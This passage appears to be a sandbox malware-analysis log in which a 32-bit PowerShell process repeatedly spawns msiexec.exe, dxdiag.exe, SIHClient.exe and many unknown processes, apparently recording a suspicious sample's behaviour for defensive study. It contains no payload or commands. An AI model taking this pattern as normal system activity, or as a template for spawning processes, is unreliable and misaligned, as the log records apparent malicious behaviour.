Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv 2NlF6XCJtk6pGjotHbf1og.0.2	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
